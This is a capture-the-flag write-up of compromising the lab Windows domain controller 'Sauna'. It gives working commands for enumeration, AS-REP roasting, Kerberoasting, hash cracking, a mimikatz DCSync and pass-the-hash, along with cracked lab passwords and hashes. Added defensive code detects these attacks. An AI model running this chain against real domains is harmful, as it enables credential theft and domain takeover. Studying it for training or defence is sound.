Enumeration
nmap
As usual, I start by running an nmap scan with sudo nmap -sC -sV -Pn -O 10.129.95.180; sleep 5; sudo nmap -p- -Pn 10.129.95.180; sleep 5; sudo nmap -sU -Pn 10.129.95.180.
nmap scan results
Nmap scan report for 10.129.95.180
Host is up (0.029s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-08 23:27:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-04-08T23:27:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -1h00m01s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.38 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 02:27 CEST
Nmap scan report for 10.129.95.180
Host is up (0.029s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49688/tcp open unknown
49696/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 104.50 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 02:29 CEST
Nmap scan report for 10.129.95.180
Host is up (0.030s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
The results show the open ports typical of a Windows Active Directory host. For initial enumeration the most interesting ports are DNS, HTTP and SMB. If I don’t find an attack vector there, I will go on to enumerate LDAP, RPC and later ADWS.
Additionally, from the nmap scan I learned that the domain name is “EGOTISTICAL-BANK.LOCAL”, which I added to my /etc/hosts file.
I started with SMB anonymous access, but it didn’t work. I also don’t know the DC name, so I will postpone my DNS enumeration for now.
Website
I enumerated the website. Besides its funny theme, I found three different forms: a newsletter, a comment section and a contact form. I tried submitting basic, expected data to them, and they all errored out with a 405 page.
405 - HTTP verb used to access this page is not allowed.
The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.
This is strange behavior. HTTP verbs are methods like “POST”, “GET”, “PUT”, “DELETE” etc. To test this behavior out I ran BurpSuite and checked which verbs worked. From my testing, POST requests as a whole are not working, and when changed to GET the response code turns to 200.
Due to the POST body turning into GET parameters, I tried to inject the parameters with SSTI strings, XSS code and finally SQL injections manually, but I didn’t cause any unexpected behavior. I then saved the BurpSuite requests to those three forms and forwarded them into sqlmap to check further for vulnerabilities there.
In the meantime I ran directory and subdomain enumeration with ffuf.
This directory enumeration command, ffuf -u http://EGOTISTICAL-BANK.LOCAL/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt, returned:
css [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 28ms]
fonts [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 30ms]
IMAGES [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 30ms]
Fonts [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 27ms]
CSS [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 31ms]
So no interesting directories were found at first glance.
ffuf -u http://EGOTISTICAL-BANK.LOCAL/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.EGOTISTICAL-BANK.LOCAL" -fs 32797
This showed no new subdomains, so the DC hostname is still unknown.
RID bruteforcing
I tried to enumerate other host users with netexec rid-brute, but it didn’t work. The Guest account is either disabled or access was denied.
DNS
For the next step I ran dig to enumerate some basic information about the domain itself. In the SOA record I found what is most likely the DC name.
EGOTISTICAL-BANK.LOCAL. 3600 IN SOA sauna.EGOTISTICAL-BANK.LOCAL. hostmaster.EGOTISTICAL-BANK.LOCAL. 50 900 600 86400 3600
Besides that, I didn’t find any other useful data there.
LDAP
I checked LDAP with ldapsearch and it worked with anonymous access: ldapsearch -x -H ldap://10.129.95.180/ -b "DC=EGOTISTICAL-BANK,DC=LOCAL". This returned some interesting information:
Info:
ms-DS-MachineAccountQuota: 10
msDS-Behavior-Version: 7
msDS-PerUserTrustQuota: 1
msDS-AllUsersTrustQuota: 1000
msDS-PerUserTrustTombstonesQuota: 10
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
minPwdLength: 7
lockoutThreshold: 0
Key facts:
- Each user can create 10 machine accounts
- Passwords have a minimum length of 7 characters
- There are no lockouts
- There is a user “Hugo Smith” on the box
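The key facts above are exactly what a defender should be pulling out of the same anonymous LDAP read. Below is an added example (not part of the original writeup) that parses ldapsearch-style output, flags the three risky domain settings and lists the user objects that were readable without a bind. The sample LDIF is constructed from the values quoted above; the objectClass/sAMAccountName lines of the Hugo Smith entry and the 12-character baseline are assumptions.

```python
"""Audit domain policy values from an anonymous ldapsearch dump (added example)."""
# Constructed sample modelled on the ldapsearch output above; the user entry's
# objectClass/sAMAccountName lines are assumed, not quoted from the page.
SAMPLE_LDIF = """\
# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
ms-DS-MachineAccountQuota: 10
minPwdLength: 7
lockoutThreshold: 0

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: user
sAMAccountName: hsmith
"""
MIN_PWD_LENGTH = 12  # assumed local baseline, not a value from the page

def parse_ldif(text):
    """Split LDIF output into entries of {attribute: [values]}, skipping comments."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():                 # blank line terminates an entry
            if current:
                entries.append(current)
            current = {}
        elif not line.startswith("#"):
            attr, _, value = line.partition(":")
            current.setdefault(attr.strip(), []).append(value.strip())
    if current:
        entries.append(current)
    return entries

def audit_policy(entries):
    """Map each risky domain-level attribute to a finding; empty dict means nothing flagged."""
    root = next((e for e in entries if e.get("dn", [""])[0].startswith("DC=")), {})
    val = lambda attr: int(root[attr][0]) if attr in root else None
    findings = {}
    if val("lockoutThreshold") == 0:
        findings["lockoutThreshold"] = "0: no lockout, online password guessing is unthrottled"
    if val("minPwdLength") is not None and val("minPwdLength") < MIN_PWD_LENGTH:
        findings["minPwdLength"] = f"{val('minPwdLength')}: below the {MIN_PWD_LENGTH} baseline"
    if (val("ms-DS-MachineAccountQuota") or 0) > 0:
        findings["ms-DS-MachineAccountQuota"] = (
            f"{val('ms-DS-MachineAccountQuota')}: any user may join that many computers")
    return findings

def list_users(entries):
    """sAMAccountNames of user objects; readable anonymously, which is itself a finding."""
    return sorted(e["sAMAccountName"][0] for e in entries if "user" in e.get("objectClass", []))
```

The fact that any of this is readable without credentials is the first finding; the per-attribute checks then explain why the rest of the box plays out the way it does (no lockout makes the later password spraying and roasting risk-free for the attacker).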
Foothold
fsmith
Looking at the website, I found this user mentioned alongside other people. Seeing as I have basic information about the password policy and I know some users, I could consider a bruteforce attack if I don’t find any other valid vector.
Interestingly, on the website there are “Hugo Bear” and “Fergus Smith”, but in the LDAP search I found “Hugo Smith”.
I double-checked other options to pivot, but besides running more wordlists for directories and subdomains, or performing an IIS tilde enumeration (which would take considerable time to set up), I could only bruteforce some usernames and later passwords.
I had already found a number of usernames on the website and with my LDAP enumeration. I don’t know the format they use in the company, so I decided to use username-anarchy to generate a number of common formats from the full names. I tried to create a nice loop with for and while, but for some reason I couldn’t make it run username-anarchy correctly. To save some time I just manually swapped the name in the username-anarchy Sophie Driver >> users.txt command and created the username list that way.
With this list I ran kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc sauna.EGOTISTICAL-BANK.LOCAL users.txt and came up with two valid users: “hsmith@EGOTISTICAL-BANK.LOCAL” and “fsmith@EGOTISTICAL-BANK.LOCAL”.
I took those usernames, created a smaller wordlist with variants with and without the domain attached, and ran them against a relatively small password wordlist.
Then I just ran netexec smb 10.129.95.180 -u users.small -p /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt.
While this was running, I had an idea from when I used kerbrute: I can check for kerberoastable and AS-REP roastable users.
Never mind, without any creds I can only AS-REP roast - let’s do it anyway: GetNPUsers.py -request -usersfile users.small -dc-host sauna.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL/ -no-pass
We do get one hit:
Loot:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c53a1f5178113124e04b6272ff3b310b$e1e03544cd582d16c1a209f6d03eade305d1486987508688163a7e59956eabf6c5fa32f62531f72a4c0086d683e87fe7c112b6029171b747db50cc455a0b7deef4e0af2ec47dddd9fba2875e1ad2023eaa1c0a77fe06d65771e6171aa3650167b3360d9adb98d4e05fa1b78208c715b1bc14d9addab4079e68a3bddfa3173a5bba4f2865f69a746762bb2e42d5847a15ba7312cbd5d63457cf1178e6ec7295fce2895c088076ab2cfee7e47f6e100729a6010faa4ec70cadf185c17c76b56c72b748410da8b3b07e50ce934e309b2897a8c4364c2f4c0e7c05471f70fc9e309df3430315fd02343141e78b496813798e23be753b581de2681ed27b4897d68998
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:113e3f966c27ca16a99365459ace54ea$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
I scraped that data for the user fsmith into a separate file and ran it through rockyou.txt with hashcat -m 18200 fsmith.asrep /usr/share/wordlists/rockyou.txt.
We got credentials! fsmith:Thestrokes23
I checked the different services the user can access with netexec and found that they can winrm into the host and see some non-default SMB shares.
I went into the host and grabbed the user flag from there. I did some manual enumeration and didn’t find anything promising. In the /Users folder we can see one service account which gives an unexpected error message when we try to access its files: Cannot find path 'C:\Users\svc_loadnmgr' because it does not exist.
Looking at those SMB shares, the most interesting of the custom ones is “RICOH Aficio SP 8300DN PCL 6”, on which I have write permissions, with the remark “We can’t print money” - let’s check it out.
smbclient -U fsmith "//10.129.95.180/RICOH Aficio SP 8300DN PCL 6". Sadly, I can’t view the contents of this share.
Looking at the second one, “print$”, we can see that it’s likely connected to a printer or to its configuration or internal file structure.
Bloodhound
It all seems to be hinting at something like a print spooler priv-esc vector. Before I decide on my path, let’s check bloodhound first.
bloodhound-python -u fsmith -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -dc sauna.EGOTISTICAL-BANK.LOCAL -ns 10.129.95.180 -c all; rusthound-ce -d EGOTISTICAL-BANK.LOCAL -u fsmith -p 'Thestrokes23' --zip -c All
Bloodhound shows that:
- “SAUNA.EGOTISTICAL-BANK.LOCAL” computer object has weak supported encryption types
- “HSMITH@EGOTISTICAL-BANK.LOCAL” is kerberoastable
- “SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL” has GetChanges on “EGOTISTICAL-BANK.LOCAL” itself.
Looking at OSINT on the RICOH Aficio SP 8300DN PCL 6 printer, I see it was associated with some vulnerabilities in the past. This is likely something I could use. My current plan of attack is to kerberoast HSmith. Then I will see if he has any additional access (like that SMB share), and then look for a printer exploit. I suspect that a successful exploit will drop me into the svc_loanmgr account, which I hope has DCSync rights.
Privilege Escalation
hsmith
I start with the kerberoast. First sudo ntpdate 10.129.95.180 to fix the clock skew, and then GetUserSPNs.py -request-user hsmith -dc-ip 10.129.95.180 EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23. Below is the hash.
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$87d4af1eafee29c894d27ab456393742$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
I put it into a separate file and ran it through rockyou.txt with hashcat -m 13100 hsmith.tgs /usr/share/wordlists/rockyou.txt.
I cracked the password and it’s “Thestrokes23”, the same one as for fsmith. I enumerated this account a bit and it seems to have the same set of rights and permissions as fsmith, but lacking in some aspects - no winrm, for example.
I feel like following this new account is unintended. I will read up on that printer and think of a plan for how to exploit it with my current credentials. If nothing comes to mind, I will consider looking at whether I can somehow enable the svc_loanmgr account, and maybe run WinPEAS as well.
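Both roasting steps above (the AS-REP roast of fsmith and the Kerberoast of hsmith) leave a distinct footprint on the domain controller: a 4768 accepted with Pre-Authentication Type 0, and a 4769 for a user SPN with RC4 (etype 0x17, the "$23$" in both hashes). This added example, not from the original writeup, runs that detection logic over constructed 4768/4769 events in the EventData field layout; the attacker address 10.10.14.5 and the events themselves are assumptions, not logs from the box.

```python
"""Flag AS-REP roasting and Kerberoasting candidates in DC Kerberos events (added example)."""
from collections import defaultdict

RC4_HMAC = "0x17"  # etype 23, the "$23$" in the two hashes above; the cheapest to crack offline

# Constructed events in the EventData field layout of Windows 4768/4769; not real logs.
# 10.10.14.5 is an assumed source address for the host running the Impacket tools.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "fsmith", "ServiceName": "krbtgt", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "hsmith", "ServiceName": "krbtgt", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.129.95.180"},
    {"EventID": 4769, "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL", "ServiceName": "HSmith",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL", "ServiceName": "SAUNA$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5"},
]

def classify(event):
    """Label one event, or return None when it looks like ordinary Kerberos traffic."""
    svc = event["ServiceName"]
    if event["EventID"] == 4768 and event["PreAuthType"] == "0":
        # AS-REQ accepted without pre-authentication: the account is AS-REP roastable
        return "asrep_roast"
    if (event["EventID"] == 4769 and event["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt"):
        # RC4 service ticket for a user (not machine) SPN: the classic Kerberoast request
        return "kerberoast"
    return None

def detect(events):
    """Group findings by source IP: {ip: {label: [accounts]}}; '::ffff:' prefixes are stripped."""
    per_ip = defaultdict(lambda: defaultdict(list))
    for ev in events:
        label = classify(ev)
        if label is None:
            continue
        account = ev["TargetUserName"] if ev["EventID"] == 4768 else ev["ServiceName"]
        ip = ev["IpAddress"].replace("::ffff:", "", 1)
        per_ip[ip][label].append(account)
    return {ip: dict(labels) for ip, labels in per_ip.items()}
```

A Pre-Authentication Type of 0 also fires for legitimate logons of an account with pre-auth disabled, so the durable fix is removing that flag (and the RC4 etypes BloodHound flagged on the SAUNA computer object); the per-IP grouping is what separates a roasting sweep from one user signing in.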
svc_loanmgr
Promising article. There also seems to be a Metasploit module for it, but I’d rather do it manually.
I studied this article and tried to edit the attached scripts, but I didn’t feel confident they would work. So I went the Metasploit way: I created a meterpreter shell, ran it, caught it with exploit/multi/handler and tried to run the exploit from there. With both the x64 and x86 versions of the payload I got the information that the payload failed because the architecture didn’t match the environment. I tried migrating the process around, to no avail.
I decided to take a step back and run WinPEAS on the target host to look for any alternative ways to priv-esc.
To my surprise, winpeas found clear-text autologon credentials! I don’t think I have ever seen them utilized on a box before - svc_loanmanager:Moneymakestheworldgoround!
I checked possible access with netexec but didn’t find anything. I also struggled to spawn a cmd or PowerShell shell with runas within winrm.
Previously I noted this fact: “SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL” has GetChanges on “EGOTISTICAL-BANK.LOCAL” itself.
I will try to run secretsdump.py with the creds I know and maybe I will be able to dump the data.
secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmanager:'Moneymakestheworldgoround!'@sauna.EGOTISTICAL-BANK.LOCAL
I wasn’t able to dump that data and struggled a lot to understand why the user was not being found by my tools. I searched with ldapsearch and enumerated a lot of data. I later realized that the user was first named “svc_loanmanager” but in bloodhound it’s “svc_loanmgr”. It took me too long to admit that mistake. Even though I fixed my secretsdump.py syntax, it still wouldn’t allow me to dump the data.
Administrator
I then double-checked my permissions in bloodhound and proceeded to download mimikatz onto the target. I wasn’t able to run it interactively with .\mimikatz.exe as it looped trying to start mimikatz in that mode. To avoid this, I ran it with one-liners like .\mimikatz.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit.
This command returned the administrator’s NTLM hash, 823452073d75b9d1cf70ebdf86c7f98e, which I used with evil-winrm -i 10.129.95.180 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e.
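The DCSync above works only because svc_loanmgr holds the replication extended rights BloodHound showed earlier, and a non-DC principal exercising them is exactly what a 4662 audit event records. This added example (not from the writeup) matches the three DS-Replication control-access GUIDs in constructed 4662 events and reports any subject outside an allowlist of DC machine accounts; the allowlist containing SAUNA$ and the sample events are assumptions.

```python
"""Flag DCSync-style replication requests in 4662 directory-service audit events (added example)."""

# Control-access rights that directory replication (and therefore DCSync) needs on the domain NC.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"           # AccessMask value for an extended (control-access) right
EXPECTED_REPLICATORS = {"SAUNA$"}  # assumed allowlist: the domain controllers' machine accounts

# Constructed 4662 events in the EventData field layout; not real logs from the box.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "svc_loanmgr",
     "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                                          " {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "SAUNA$",
     "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICAL-BANK", "SubjectUserName": "fsmith",
     "AccessMask": "0x10", "Properties": "{11111111-2222-3333-4444-555555555555}"},  # unrelated
]

def replication_rights_used(event):
    """Names of replication extended rights found in the event's Properties field."""
    rights = []
    for token in event.get("Properties", "").split():   # GUIDs may be space- or newline-separated
        name = REPL_RIGHTS.get(token.strip("{}").lower())
        if name:
            rights.append(name)
    return rights

def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Return [(DOMAIN\\user, [rights])] for principals outside the allowlist that replicate."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != CONTROL_ACCESS:
            continue
        rights = replication_rights_used(ev)
        if rights and ev["SubjectUserName"] not in expected:
            hits.append((f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}", rights))
    return hits
```

Detection is the second line here; the first is the ACL review BloodHound already did for the attacker, i.e. removing these rights on the domain object from every principal that is not a domain controller.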
Closing Thoughts
Sauna is an interesting machine. It goes through a relatively straightforward attack path, but I fell into a number of false assumptions and rabbit holes which cost me a lot of time. It serves as a great reminder to perform a full enumeration before jumping to any conclusions, to leave no stone unturned and to pay attention to small details.
My first assumption was that the foothold would be related to the website, but in the end it wasn’t really useful besides learning the names of some users. Later I convinced myself that the correct privilege escalation vector would be related to a printer - CVE-2019-19363 to be specific - but it wasn’t that at all. Lastly I wasted a lot of additional time figuring out why “svc_loanmanager” didn’t work, and I didn’t connect the dots that the username was wrong or had just been edited in the past.
Fun box.
